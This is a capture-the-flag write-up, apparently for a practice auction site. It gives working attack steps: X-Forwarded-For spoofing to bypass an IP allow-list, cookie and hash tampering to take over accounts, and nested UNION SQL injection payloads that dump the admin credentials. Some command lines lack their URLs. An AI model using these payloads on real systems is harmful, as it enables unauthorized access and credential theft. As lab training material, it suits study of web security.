
Flag 1

Try to guess the path, in robots.txt

User-agent: *
Disallow: s3cr3t-4dm1n/

But it gives a 403 response while accessing s3cr3t-4dm1n. Try to scan any subpath in s3cr3t-4dm1n/ with dirb.

dirb ../dirb222/wordlists/common.txt
---- Scanning URL: ----                                                                                       
+ (CODE:200|SIZE:69)

Now we have an accessible path .htaccess. Request the file it with httpie.

http -v

GET /c9c213fc7b/s3cr3t-4dm1n/.htaccess HTTP/1.1
User-Agent: HTTPie/1.0.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 29 Mar 2021 06:16:00 GMT
Content-Type: plain/text
Transfer-Encoding: chunked
Connection: keep-alive
Content-disposition: attachment; filename=.htaccess

Order Deny,Allow
Deny from all
Allow from
Allow from

Allowed IPs are and Now try to request s3cr3t-4dmin again with one of these IPs.

http -v GET X-Forwarded-For:

In response there is one flag and admin login form.

Flag 2

Register a user account and login with it, there are four options in dashboard. Switch to subusers, it allows us to register subuser under current user account. The request needs three parameters, owner_hash, new_username and new_password. It’s slightly different from register form at home page, try to request a new account with owner_hash parameter and the value is account hash of user hunter2. Account hash of user hunter2 is located in a hidden field in password reset page.

http -v --form POST owner_hash=cf505baebbaf25a0a4c63eb93331eb36 new_username=888 new_password=onetwo

Now the new user 888 has been created, login with it, the account is still awaiting activation, but we get the second flag.

Flag 3

To activate user 888, we need to login as another user one to use the subuser enable function, but change the subuser hash to 888’s account hash and userhash in cookie to hunter2’s account hash.

http -v --form POST \

After the previous step, logout user one and login as user 888, the third flag is right under user details.

Flag 4

In source code of Your Auctions section exists a subpathauctions/questions, it takes one parameter id, which is auction type id from 1 to 5.

{"name":"Desktops","questions":[{"question":"Make","field_name":"field_4728_186574"},{"question":"Model","field_name":"field_5738_281961"},{"question":"RAM","field_name":"field_5051_369408"},{"question":"Processors","field_name":"field_4032_347621"}],"auctions":[{"id":"1","title":"Ultra Desktop"},{"id":"9","title":"Premium Desktop"},{"id":"10","title":"Work Station"}]}

If we give it id=0, error message returns.

{"error":"Invalid auction type ID entered"}

A normal response contains three fields, name, questions and auctions. Try to use union to guess some information out of it.

0 union select '0 union select 1',2,'[]' --

Payload above give us the following response.


Keep adding column numbers until something different shown.

0 union select '0 union select 1,2,3,4,5,6,7,8,9',10,'[]' --

In response column 1 was taken as auction id, column 6 was taken as title and name was replaced by 10.


Now chage 1 to table_name to get table names from information_schema.

0 union select '0 union select table_name,2,3,4,5,6,7,8,9 from information_schema.tables',10,'[]' --

In output, table admin and auction are interesting.


Try to list columns in table admin.

0 union select '0 union select COLUMN_NAME,2,3,4,5,6,7,8,9 from INFORMATION_SCHEMA.COLUMNS where table_name="admin"',10,'[]' --

Now we know there are three columns in the table, try to fetch username and password from it, replace column 1 with username and column 6 with password.

0 union select '0 union select username,2,3,4,5,password,7,8,9 from admin',10,'[]' --

So the username is h4ckerbayadmin and password is auction$rFun!.

Remember the admin login page we get before? Now login with correct credential.

http -v --form POST \
  X-Forwarded-For: \
  username=h4ckerbayadmin \

Access admin page with received token.

http -v GET\
  X-Forwarded-For: \

Input the auction hash shown in dashboard/auctions page while login as 888.

http -v --form POST\
  X-Forwarded-For: \
  Cookie:admin-token=DF120B994C5FD4377A42F55D086F6EF7 \

Delete it with action=delete

http -v --form POST \
  X-Forwarded-For: \
  Cookie:admin-token=DF120B994C5FD4377A42F55D086F6EF7 \
  auction_hash=8ylbbgs2 \

The last flag is in response.